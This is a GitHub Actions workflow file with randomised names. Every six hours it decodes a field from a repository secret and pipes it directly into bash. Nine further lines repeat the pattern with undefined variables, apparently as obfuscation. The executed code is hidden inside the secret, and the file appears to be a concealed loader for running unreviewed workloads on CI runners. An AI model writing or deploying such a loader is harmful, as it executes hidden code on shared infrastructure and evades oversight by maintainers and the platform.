name: persuadetour
on:
  workflow_dispatch:
  schedule:
    - cron: '45 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: persuadetour
        env:
          gs248: ${{ secrets.gs248 }}
        run: |
          echo $gs248 | jq -r .d7 | /bin/bash
          echo $mtgs4 | jq -r .ltdws78530 | /bin/bash
          echo $iojjq8 | jq -r .m71548 | /bin/bash
          echo $f0322 | jq -r .j03251 | /bin/bash
          echo $c6 | jq -r .ytb8223 | /bin/bash
          echo $c128 | jq -r .wbdpd96 | /bin/bash
          echo $va8 | jq -r .uxh2 | /bin/bash
          echo $evyx20022 | jq -r .qhg50388 | /bin/bash
          echo $i22136 | jq -r .vzfj783 | /bin/bash
          echo $i44210 | jq -r .apqve396 | /bin/bash

